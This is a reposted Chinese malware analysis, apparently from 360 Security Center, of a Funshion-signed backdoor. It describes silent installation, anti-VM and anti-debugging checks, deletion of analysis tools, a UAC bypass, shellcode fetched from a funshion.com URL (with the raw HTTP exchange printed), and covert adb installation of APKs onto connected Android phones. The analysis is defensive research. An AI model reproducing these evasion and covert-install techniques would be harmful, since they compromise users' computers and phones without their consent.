<span id="7ztzv"></span>
<sub id="7ztzv"></sub>

<span id="7ztzv"></span><form id="7ztzv"></form>

<span id="7ztzv"></span>

        <address id="7ztzv"></address>

            原文地址:http://drops.wooyun.org/papers/9736

            by qxnjawk

            0x00 摘要


            最近,360安全中心檢測到,大量推廣程序在推廣一款帶有有效風行簽名——“Beijing Funshion Online Technologies Ltd.”的靜默安裝程序。后續分析發現,該程序靜默安裝,無法卸載,通過LSP注入系統各個聯網進程執行。帶有反虛擬機,反調試,抗分析,遠程控制,遠程執行的能力,是一款植入用戶計算機的后門程序。

            0x01 FunMini文件分析


            基本信息:

            行為概述:

            該樣本運行之后,會對目標機器的環境進行檢測:檢測虛擬機,各種程序開發工具等。

            如果不存在開發工具和虛擬機,就會下載一個后門dll程序加載執行,該dll還會進行手機app推廣。

            行為詳解:

            木馬檢查用戶機器上是否存在IDA, vc6.0, windbg.exe等分析人員常用的分析工具。這類檢測在木馬程序中很常見,正常面向大眾的軟件,很少做這類檢測。

            以下為木馬檢測的所有字符串的內存截圖:

            檢測通過之后,后門從服務器下載一個名為Foamii.dll的文件,而該文件才是一切行為的核心。

            0x02 Foamii.dll文件分析


            基本信息:

            行為詳解:

            木馬首先調用WinExec函數啟動rundll32.exe作為宿主進程,調用Foamii.dll的startup函數

            運行后,dll會從服務器讀取在線shellcode代碼到本地

            shellcode的遠端地址竟然就堂而皇之的掛在風行官網上:http://fld.funshion.com/instant/instant?bid=52用瀏覽器打開該URL內容如下:

            數據報文如下圖:

            GET /instant/instant?bid=52 HTTP/1.1
            Cache-Control: max-age=43200
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Funshion/1.0.0.1
            Host: fld.funshion.com
            Connection: Keep-Alive
            
            
            HTTP/1.1 200 OK
            Server: nginx/1.2.0
            Date: Wed, 23 Sep 2015 07:12:02 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            
            184
            ..TKDS…..$..e..1..}…_/…6………..d..`CG..W…S…..V……=-…..\.Gd4..*..a}…X.#..Y…}R …o\W.]I.M.Jw…%.Lm.l._..Zq..n1.X[+F.+….~…c.J…~.]./..’d2…….z.c(.{.(.n..%..8=.3`.`.W…!….E..1.j.U….[..
            #……T&…/……!<.[email protected]=yH.i.MV…..i…..A…..e.._g.YL`…..,5]R..`……&
            Y….(e….@.J.%.O.T.l..U+…….5..6.]..a{`.? .IEX….<xx…..-…k…}…I..\
            0
            

            而加載shellcode后,代碼會向服務器發起訪問,返回信息則是一個json串:

            顯然,json串中又為shellcode指明了一個新的下載地址,下載回來的則是一個名為Foamii.zip的壓縮文件

            當Foamii.dll將Foamii.zip下載回來之后,將其解壓,并進一步釋放了一個名為FunNail.dll的程序

            0x03 FunNail.dll文件分析


            文件信息:

            行為概述:

            該程序被運行后,首先會檢測當前環境是否運行于虛擬機當中,同時刪除PcHunter, smiff等常見分析工具。然后下載推廣程序,進行推廣。

            行為詳解:

            木馬調用IsProcessorFeaturePresent檢測自身是否正處于調試環境中,由此判斷自身是否正在被分析人員分析:

            若并非處于調試環境中,則申請內存執行shellcode

            之后,創建一個模態對話框,關鍵的工作函數就放在了窗體回調函數中:

            工作函數中,首先是檢測虛擬機情況,看自己是否運行于虛擬機之中:

            而后,程序會對磁盤中的進行遍歷

            遍歷文件過程中,一旦發現檢測分析工具則立即刪除:

            刪除PCHunter32.exe文件

            刪除smsniff.exe文件

            另外,此處還有一個插曲:如果程序檢測到當前正運行于Win7之后的系統,程序甚至還有專門用于繞過UAC防護的代碼,考慮不可謂不周到。

            一切準備工作停當之后,便下載了一套安卓手機的連接組件回來:

            同時開啟一個轉么的線程,用來等待手機usb設備接入

            一旦發現有安卓手機接入,則創建一個可讀寫的pipe管道,主要為adb fork-server 服務。

            而后利用adb命令在手機端創建一個 adb fork-server server進程 ,用于通過adb連接繼而到電腦的手機。

            在手機中創建進程adb fork-server server成功之后,會讀取手機端adb fork-server server的數據

            并啟動daemon 守護進程

            同時下載一個或幾個APK文件到本地:

            現在要做的,就是找到SD卡或者手機內部存儲的tmp路徑,并將已經準備好的apk文件推送到手機當中:

            最后,安裝并啟動安卓的daemon守護進程,拼接adb shell:install命令用來啟動apk進行流氓推廣

            以上這一切,用戶是完全沒有任何感知的,能感知到的唯有在手機上的這一次又一次的不期而遇而已……

            0x04 總結


            360安全中心最早接到關于帶有風行簽名程序從PC端向安卓機強推安卓應用的問題,最早見于去年(2014年)12月中旬,當時就曾組織過技術力量對該族系推廣進行過攔截。但在沉寂了9個多月之后,今年9月中旬,該族系又變換了更加犀利的反安全軟件代碼卷土重來。

            目前360已對其推廣做了攔截,并提醒用戶及時清理,該后門安裝量已經過數百萬臺,并且依然在不斷的變種與我們進行對抗。

            由衷希望廠商管理好自己產品,不要在這條路上越走越遠才好。

            <span id="7ztzv"></span>
            <sub id="7ztzv"></sub>

            <span id="7ztzv"></span><form id="7ztzv"></form>

            <span id="7ztzv"></span>

                  <address id="7ztzv"></address>

                      亚洲欧美在线